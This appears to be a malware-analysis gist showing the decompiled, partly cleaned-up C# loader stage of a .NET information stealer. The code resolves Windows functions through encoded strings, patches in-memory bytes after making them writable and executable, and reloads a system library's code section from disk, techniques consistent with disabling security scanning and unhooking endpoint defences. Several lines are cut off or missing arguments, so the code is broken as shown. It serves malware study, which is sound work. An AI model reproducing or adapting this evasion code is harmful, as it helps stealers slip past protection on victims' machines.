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Created September 19, 2023 16:21
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.NET Stealer Debunked. Stage 3 (Cleanup obfuscation)
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
namespace EdvgVD
// Token: 0x02000002 RID: 2
internal class Class0
// Token: 0x04000001 RID: 1
private static readonly Process Process0 = Process.GetCurrentProcess();
// Token: 0x04000002 RID: 2
private static readonly SnnkTwxWvo SnnkTwxWvo0 = Marshal.GetDelegateForFunctionPointer<SnnkTwxWvo>(smethod_2(
MasterModule.StringDecode("啒啌啙啕啌啓唚唙唕啋啓啓", -500542233),
MasterModule.StringDecode("铠锉锌锐锂铥链锋锁锉锂", 2053936285)));
// Token: 0x04000003 RID: 3
private static readonly CsklprZdjd CsklprZdjd0 = Marshal.GetDelegateForFunctionPointer<CsklprZdjd>(smethod_2(
MasterModule.StringDecode("榁楻榈榄楻概楉楈楄楺概概", 1449879830),
// Token: 0x04000004 RID: 4
private static readonly BuuqRlTrkB BuuqRlTrkB0 = Marshal.GetDelegateForFunctionPointer<BuuqRlTrkB>(smethod_2(
MasterModule.StringDecode("", -1944456990),
// Token: 0x04000005 RID: 5
private static readonly HGpyNxaPNy HGpyNxaPNy0 = Marshal.GetDelegateForFunctionPointer<HGpyNxaPNy>(smethod_2(
MasterModule.StringDecode("綾綸緅緁綸綿綆綅綁綷綿綿", 257523027),
// Token: 0x04000006 RID: 6
private static readonly JgHrUYuwVv JghrUYuwVv0 = Marshal.GetDelegateForFunctionPointer<JgHrUYuwVv>(smethod_2(
MasterModule.StringDecode("涴涮涻涷涮涵浼浻海涭涵涵", -1961267895),
MasterModule.StringDecode("秹稨稛稗稪稛秼稟稢稛稃稗稦稦稟稤稝秷", -433620554)));
// Token: 0x04000007 RID: 7
private static readonly OZwpHxsXtH OZwpHxsXtH0 = Marshal.GetDelegateForFunctionPointer<OZwpHxsXtH>(smethod_2(
// Token: 0x04000008 RID: 8
private static readonly CgLuGvcMyS CgLuGvcMyS0 = Marshal.GetDelegateForFunctionPointer<CgLuGvcMyS>(smethod_2(
MasterModule.StringDecode("", 826732802),
MasterModule.StringDecode("뷅붽뷅붻뷈뷑", -116802216)));
// Token: 0x04000009 RID: 9
private static readonly RkpKtVNcwS RkpKtVNcwS0 = Marshal.GetDelegateForFunctionPointer<RkpKtVNcwS>(smethod_2(
MasterModule.StringDecode("즈즋쥹즈즁쥆쥼즄즄", -1428633320),
MasterModule.StringDecode("", 1906766718)));
// Token: 0x0400000A RID: 10
private static readonly QwvpmikZqq QwvpmikZqq0 = Marshal.GetDelegateForFunctionPointer<QwvpmikZqq>(smethod_2(
MasterModule.StringDecode("”‗․†‗„ῥῤῠ‖„„", 386801586),
// Token: 0x06000002 RID: 2 RVA: 0x00002358 File Offset: 0x00000558
public static void Main()
const string @string = "䢸䢾䢮䢶䢶䡸䢮䢶䢶";
// 96515219;
if (Environment.OSVersion.Version.Major >= 10 || IntPtr.Size == Math.Abs(Math.Min(8, Math.Abs(2147483647))))
smethod_1(MasterModule.StringDecode("╥╟╬╨╟╦┭┬┨╞╦╦", 311502074));
smethod_0(MasterModule.StringDecode("￳￿\u0005￀￶￾￾", 731971474),
MasterModule.StringDecode("札杙束杕朿杏杍杚朮条杒杒村杞", 934438636),
smethod_0(MasterModule.StringDecode("", -198971527),
Convert.FromBase64String(MasterModule.StringDecode("⑂⑂␈␈", -1909972021)),
// Token: 0x06000003 RID: 3 RVA: 0x00002DD8 File Offset: 0x00000FD8
private static void smethod_0(string string0, string string1, byte[] byte0, byte[] byte1)
var intPtr = smethod_2(string0, string1);
if (intPtr == IntPtr.Zero) throw new Exception();
var size = IntPtr.Size;
var num = 6;
var num2 = num + sizeof(ushort);
byte[] array;
array = size == num2 ? byte0 : byte1;
BuuqRlTrkB0(intPtr, (IntPtr)array.Length,
64, out var newProtect);
Marshal.Copy(array, 0, intPtr, array.Length);
BuuqRlTrkB0(intPtr, (IntPtr)array.Length, newProtect, out newProtect);
// ignored
// Token: 0x06000004 RID: 4 RVA: 0x00002F70 File Offset: 0x00001170
private static void smethod_1(string string0)
QwvpmikZqq0(Process0.Handle, out var flag);
const string @string = "ꪺꪱ꫓꫎ꫠꫥꫛꫦꫮꫪ꫓꫊꫰ꫪꫫꫜꫤꪪꪩ꫓";
// 2;
var str = MasterModule.StringDecode(@string, -1755796873);
if (flag && IntPtr.Size == Math.Abs(Math.Min(4, Math.Abs(2147483647))))
str = MasterModule.StringDecode("큫큢킄큿킑킖킌킗킟킛킄큻킡킛큿큷큿큞큜킄", -2124099544);
var intPtr = smethod_3(string0);
if (!(intPtr == IntPtr.Zero))
if (!RkpKtVNcwS0(Process0.Handle, intPtr, out var rEIlnncGsj, (uint)sizeof(ReIlnncGsj))) return;
var intPtr2 = HGpyNxaPNy0(str + string0, 2147483648U,
3, 0U, IntPtr.Zero);
if (intPtr2 == (IntPtr)(-1))
var intPtr3 = JghrUYuwVv0(intPtr2, IntPtr.Zero,
16777218, 0U, 0U, null);
if (intPtr3 == IntPtr.Zero)
var intPtr4 = OZwpHxsXtH0(intPtr3,
4, 0U, 0U,
if (intPtr4 == IntPtr.Zero) return;
var num2 = Marshal.ReadInt32((IntPtr)((long)rEIlnncGsj.BaseOfDll + 60));
var num3 = Marshal.ReadInt16((IntPtr)((long)intPtr + num2 + 6));
var num4 = Marshal.ReadInt16(intPtr,
num2 + 20);
for (short num5 = 0;
num5 < num3;
num5 = (short)(num5 + 1))
var intPtr5 = (IntPtr)((long)intPtr + num2 + 24 + num4 + num5 * 40);
if (Marshal.ReadByte(intPtr5) != 46 ||
Marshal.ReadByte((IntPtr)((long)intPtr5 + 1)) != 116 ||
Marshal.ReadByte((IntPtr)((long)intPtr5 + 2)) != 101 ||
Marshal.ReadByte((IntPtr)((long)intPtr5 + 3)) != 120 ||
Marshal.ReadByte((IntPtr)((long)intPtr5 + 4)) != 116) continue;
var num6 = Marshal.ReadInt32((IntPtr)((long)intPtr5 + 12));
var num7 = (uint)Marshal.ReadInt32((IntPtr)((long)intPtr5 + 8));
BuuqRlTrkB0((IntPtr)((long)intPtr + num6), (IntPtr)num7, 64,
out var newProtect);
CgLuGvcMyS0((IntPtr)((long)intPtr + num6),
(IntPtr)((long)intPtr4 + num6), (IntPtr)num7);
BuuqRlTrkB0((IntPtr)((long)intPtr + num6), (IntPtr)num7, newProtect,
out newProtect);
// goto IL_B97;
// ignored
// Token: 0x06000005 RID: 5 RVA: 0x00002050 File Offset: 0x00000250
public static IntPtr smethod_2(string string0, string string1)
return smethod_4(smethod_3(string0), string1);
// Token: 0x06000006 RID: 6 RVA: 0x00003B5C File Offset: 0x00001D5C
public static IntPtr smethod_3(string string0)
var modules = Process0.Modules;
foreach (var obj in modules)
var processModule = (ProcessModule)obj;
if (processModule.FileName.ToLower().EndsWith(string0.ToLower())) return processModule.BaseAddress;
return IntPtr.Zero;
// Token: 0x06000007 RID: 7 RVA: 0x00003BE0 File Offset: 0x00001DE0
public static IntPtr smethod_4(IntPtr intptr0, string string0)
var intPtr = IntPtr.Zero;
var num = intptr0.ToInt64();
int num3;
var num2 = 52;
num3 = num2 + sizeof(ulong);
var num4 = Marshal.ReadInt32((IntPtr)(num + num3));
Marshal.ReadInt16((IntPtr)(intptr0.ToInt64() + num4 +
var num5 = intptr0.ToInt64() + num4 + 24;
var num6 = Marshal.ReadInt16((IntPtr)num5);
long value;
if (num6 == Math.Abs(Math.Min(267, Math.Abs(2147483647))))
value = num5 + 96;
value = num5 + 112;
var num7 = Marshal.ReadInt32((IntPtr)value);
var num8 = Marshal.ReadInt32((IntPtr)(intptr0.ToInt64() + num7 + Math.Abs(Math
.Min(16, Math.Abs(int.MaxValue)))));
Marshal.ReadInt32((IntPtr)(intptr0.ToInt64() + num7 + 20));
var num9 = Marshal.ReadInt32((IntPtr)(intptr0.ToInt64() + num7 +
var num10 = Marshal.ReadInt32((IntPtr)(intptr0.ToInt64() + num7 +
var num11 = Marshal.ReadInt32((IntPtr)(intptr0.ToInt64() + num7 +
var num12 = Marshal.ReadInt32((IntPtr)(intptr0.ToInt64() + num7 +
for (var i = 0; i < num9; i += 1)
var text = Marshal.PtrToStringAnsi((IntPtr)(intptr0.ToInt64() + Marshal.ReadInt32(
(IntPtr)(intptr0.ToInt64() + num11 +
i * 4))));
if (text != null && text.Equals(string0,
(StringComparison)Math.Abs(Math.Min(5, Math.Abs(2147483647)))))
var num13 = Marshal.ReadInt16((IntPtr)(intptr0.ToInt64() + num12 +
i * 2)) + num8;
var num14 = Marshal.ReadInt32((IntPtr)(intptr0.ToInt64() + num10 +
4 *
(num13 - num8)));
intPtr = (IntPtr)((long)intptr0 + num14);
throw new InvalidOperationException();
if (intPtr == IntPtr.Zero) throw new MissingMethodException();
return intPtr;
// Token: 0x02000003 RID: 3
public struct ReIlnncGsj
// Token: 0x0400000B RID: 11
public IntPtr BaseOfDll;
// Token: 0x0400000C RID: 12
public uint SizeOfImage;
// Token: 0x0400000D RID: 13
public IntPtr EntryPoint;
// Token: 0x02000004 RID: 4
// (Invoke) Token: 0x0600000B RID: 11
private delegate bool SnnkTwxWvo(IntPtr handle);
// Token: 0x02000005 RID: 5
// (Invoke) Token: 0x0600000F RID: 15
private delegate bool CsklprZdjd(IntPtr module);
// Token: 0x02000006 RID: 6
// (Invoke) Token: 0x06000013 RID: 19
private delegate int BuuqRlTrkB(IntPtr address, IntPtr size, uint newProtect, out uint oldProtect);
// Token: 0x02000007 RID: 7
// (Invoke) Token: 0x06000017 RID: 23
private delegate IntPtr HGpyNxaPNy(string fileName, uint desiredAccess, uint shareMode,
IntPtr securityAttributes,
uint creationDisposition, uint flagsAndAttributes, IntPtr templateFile);
// Token: 0x02000008 RID: 8
// (Invoke) Token: 0x0600001B RID: 27
private delegate IntPtr JgHrUYuwVv(IntPtr file, IntPtr fileMappingAttributes, uint protect,
uint maximumSizeHigh,
uint maximumSizeLow, string name);
// Token: 0x02000009 RID: 9
// (Invoke) Token: 0x0600001F RID: 31
private delegate IntPtr OZwpHxsXtH(IntPtr fileMappingObject, uint desiredAccess, uint fileOffsetHigh,
uint fileOffsetLow, IntPtr numberOfBytesToMap);
// Token: 0x0200000A RID: 10
// (Invoke) Token: 0x06000023 RID: 35
private delegate IntPtr CgLuGvcMyS(IntPtr dest, IntPtr src, IntPtr count);
// Token: 0x0200000B RID: 11
// (Invoke) Token: 0x06000027 RID: 39
private delegate bool RkpKtVNcwS(IntPtr process, IntPtr module, out ReIlnncGsj moduleInfo, uint size);
// Token: 0x0200000C RID: 12
// (Invoke) Token: 0x0600002B RID: 43
private delegate bool QwvpmikZqq([In] IntPtr hProcess, out bool wow64Process);
internal class MasterModule
public void Main()
Console.WriteLine(StringDecode("”‗․†‗„ῥῤῠ‖„„", 386801586));
public static string StringDecode(string str0, int int1)
var stringBuilder = new StringBuilder();
var array = str0.ToCharArray();
for (var i = 0; i < array.Length; i++)
var c = array[i];
stringBuilder.Append((char)(c - int1));
return stringBuilder.ToString();
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